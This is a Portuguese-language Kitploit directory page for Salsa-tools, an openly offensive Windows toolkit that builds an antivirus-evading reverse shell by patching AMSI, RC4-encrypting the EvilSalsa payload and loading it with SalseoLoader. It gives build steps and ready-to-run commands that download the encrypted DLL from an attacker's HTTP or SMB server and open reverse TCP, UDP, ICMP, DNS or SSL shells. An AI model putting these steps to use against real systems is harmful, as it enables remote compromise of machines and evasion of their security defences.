Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Salsa-tools — Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP/Shellcode/SILENTTRINITY e bypass de AV, AMSI patched | Kitploit
Ferramentas/GitHubGitHub/hackplayers/salsa-tools
Escalada de PrivilégiosFerramentas de Criptografia/DescriptografiaExploraçãoEvasão de IDS/IPSMovimento LateralShellcodePós-ExploraçãoComando e ControleRed TeamingDesenvolvimento de Payloads
GitHub
58713057há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
hackplayers/salsa-tools

Salsa-tools

Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP/Shellcode/SILENTTRINITY e bypass de AV, AMSI patched

Ver Repositório

License

   _____       __              ______            __    
  / ___/____ _/ /________ _   /_  __/___  ____  / /____
  \__ \/ __ `/ / ___/ __ `/    / / / __ \/ __ \/ / ___/
 ___/ / /_/ / (__  ) /_/ /    / / / /_/ / /_/ / (__  ) 
/____/\__,_/_/____/\__,_/    /_/  \____/\____/_/____/  

Salsa Tools - Uma Reverse Shell AV-Safe mergulhada em molho bellota

Salsa Tools é uma coleção de três ferramentas diferentes que, combinadas, permitem obter uma reverse shell turbinada em qualquer ambiente Windows sem sequer precisar do PowerShell para sua execução. Para evitar as técnicas de detecção mais recentes (AMSI), a maioria dos componentes foi inicialmente escrita em C#. Salsa Tools foi lançada publicamente por Luis Vacas durante sua palestra “Inmersión en la explotación tiene rima” que ocorreu durante h-c0n em 9 de fevereiro de 2019.

Características

* TCP/UDP/ICMP/DNS/BIND/SSL/Shellcode/SilentTrinity     
* AV Safe (17 de fevereiro)
* Patchers de AMSI
* Execução de PowerShell 
* ...

Visão Geral

Salsa-Tools é composta por três ingredientes diferentes: - EvilSalsa - EncrypterAssembly - SalseoLoader E seu comportamento é o seguinte:

Configuração

Requisitos

  • Visual Studio 2017 (ou similar)
    • Dependências Microsoft.PowerShell.3.ReferenceAssemblies compilando em .NET 4.0
    • Dependências Microsoft.PowerShell.2.ReferenceAssemblies compilando em .NET 3.5
  • Python 2.7

Executando a Salsa

Cozinhando EvilSalsa

   ___ __ __  ____  _            
  /  _]  |  ||    || |           
 /  [_|  |  | |  | | |           
|    _]  |  | |  | | |___        
|   [_|  :  | |  | |     |       
|     |\   /  |  | |     |       
|_____| \_/  |____||_____|       
                                 
  _____  ____  _     _____  ____ 
 / ___/ /    || |   / ___/ /    |
(   \_ |  o  || |  (   \_ |  o  |
 \__  ||     || |___\__  ||     |
 /  \ ||  _  ||     /  \ ||  _  |
 \    ||  |  ||     \    ||  |  |
  \___||__|__||_____|\___||__|__|
  
[+] Esse é nosso Payload
                                 

EvilSalsa é o ingrediente chave desta receita. Contém o payload, que é executado no sistema da seguinte forma: assim que o payload inicia, ele executa System.Management.Automation.dll que cria um runspace. Dentro desse runspace temos quatro tipos de shells (TCP / UDP / ICMP / DNS / BINDTCP / SHELLCODE / SILENTTRINITY). Uma vez que EvilSalsa é carregada, a primeira coisa a fazer é verificar a existência de c:\windows\system32\amsi.dll. Se existir, é corrigida usando uma variante caseira dos bypasses do CyberArk e do Rastamouse.

Misturando EncrypterAssembly e Evilsalsa

  ______                             _            
 |  ____|                           | |           
 | |__   _ __   ___ _ __ _   _ _ __ | |_ ___ _ __ 
 |  __| | '_ \ / __| '__| | | | '_ \| __/ _ \ '__|
 | |____| | | | (__| |  | |_| | |_) | ||  __/ |   
 |______|_| |_|\___|_|   \__, | .__/ \__\___|_|   
     /\                   __/ | || |   | |        
    /  \   ___ ___  ___ _|___/|_|| |__ | |_   _   
   / /\ \ / __/ __|/ _ \ '_ ` _ \| '_ \| | | | |  
  / ____ \\__ \__ \  __/ | | | | | |_) | | |_| |  
 /_/    \_\___/___/\___|_| |_| |_|_.__/|_|\__, |  
                                           __/ |  
                                          |___/   
			  
 [+] Software que encripta o payload usando RC4
 [+] Temos a versão em Python e a versão em .exe

EncrypterAssembly pode ser usado como script Python ou como binário Exe. Ele encripta o EvilSalsa gerado anteriormente.

Uso em Python:

python encrypterassembly.py <FILE> <PASSWORD> <OUTPUT>

Uso do executável:

Encrypterassembly.exe <FILE> <PASSWORD> <OUTPUT>

Trazendo o EvilSalsa Encriptado à mesa com SalseoLoader

SalseoLoader é responsável por carregar o payload encriptado. Pode ser compilado tanto como biblioteca quanto como executável. Se executado como executável, os argumentos escolhidos devem ser fornecidos quando o executável for executado. Se compilado como biblioteca, o descritor "main" deve ser exportado. Os argumentos são adicionados usando variáveis de ambiente.

  _____  ____  _     _____   ___   ___
 / ___/ /    || |   / ___/  /  _] /   \
(   \_ |  o  || |  (   \_  /  [_ |     |
 \__  ||     || |___\__  ||    _]|  O  |
 /  \ ||  _  ||     /  \ ||   [_ |     |
 \    ||  |  ||     \    ||     ||     |
  \___||__|__||_____|\___||_____| \___/

 _       ___    ____  ___      ___  ____
| |     /   \  /    ||   \    /  _]|    \
| |    |     ||  o  ||    \  /  [_ |  D  )
| |___ |  O  ||     ||  D  ||    _]|    /
|     ||     ||  _  ||     ||   [_ |    \
|     ||     ||  |  ||     ||     ||  .  \
|_____| \___/ |__|__||_____||_____||__|\_|

                             By: CyberVaca@HackPlayers

[+] Uso:

    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT
    [-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT
    [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode
    [-] SalseoLoader.exe password http://webserver.com/silent.txt silenttrinity URL_C2C

[+] Payloads Disponíveis:

    [-] ReverseTCP  [-] ReverseDNS   [-] ReverseSSL  [-] Shellcode
    [-] ReverseUDP  [-] ReverseICMP  [-] BindTCP     [-] SilentTrinity

Tutorial

Compilando os binários

Baixe o código fonte do Github e compile EvilSalsa e SalseoLoader. Você precisará do Visual Studio instalado para compilar o código.

Compile esses projetos para a arquitetura da máquina Windows onde você vai usá-los (se o Windows suportar x64, compile para essa arquitetura).

Você pode selecionar a arquitetura dentro do Visual Studio na aba "Build" à esquerda, em "Platform Target".

(Se você não encontrar essas opções, clique na aba "Project" e depois em " Properties")

Depois, compile ambos os projetos (Build -> Build Solution) (nos logs aparecerá o caminho do executável):

Preparando o Backdoor

Primeiramente, você precisará codificar a EvilSalsa.dll. Para isso, você pode usar o script Python encrypterassembly.py ou compilar o projeto EncrypterAssembly

Python

python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll password evilsalsa.dll.txt

Windows

EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsa.dll password evilsalsa.dll.txt

Ok, agora você tem tudo que precisa para executar toda a parada do Salseo: a EvilSalsa.dll codificada e o binário do SalseoLoader. Faça upload do binário SalseoLoader.exe para a máquina. Ele não deve ser detectado por nenhum AV...

Executando o backdoor

Obtendo uma reverse shell TCP (baixando a dll codificada via HTTP)

Lembre-se de iniciar um nc como listener da reverse shell e um servidor HTTP para servir a evilsalsa codificada.

SalseoLoader.exe password http://<IP-Atacante>/evilsalsa.dll.txt reversetcp <IP-Atacante> <Porta>

Obtendo uma reverse shell UDP (baixando a dll codificada via SMB)

Lembre-se de iniciar um nc como listener da reverse shell e um servidor SMB para servir a evilsalsa codificada (impacket-smbserver).

SalseoLoader.exe password \\<IP-Atacante>/pasta/evilsalsa.dll.txt reverseudp <IP-Atacante> <Porta>

Baixar ferramenta